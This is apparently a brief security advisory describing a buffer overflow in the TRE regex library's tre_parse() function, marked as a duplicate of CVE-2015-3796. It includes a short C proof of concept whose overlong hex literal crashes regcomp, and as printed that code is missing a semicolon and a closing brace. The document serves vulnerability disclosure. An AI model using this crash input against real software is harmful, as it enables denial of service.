Note: this vulnerability is a duplicate of CVE-2015-3796.

Software: libtre5

A buffer overflow exists in tre_parse() when parsing a literal (e.g. \x{deadbeef}), used during regular expression compilation.

A 32 byte array is allocated to parse a “wide char” literal, however, no bounds checking is done on the data. Characters are only copied to the tmp buffer if they are [0-9a-fA-F] which makes arbitrary code execution fairly difficult. Denial of service is as simple as inputting a pattern with more than 32 hex characters.

Proof of concept:

$ cat poc.c
#include <tre/tre.h>
int main() {
  regex_t re;
  const char *crash = "\\x{aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
  regcomp(&re, crash, 0);
$ gcc -o poc -ltre poc.c
$ ./poc
Segmentation fault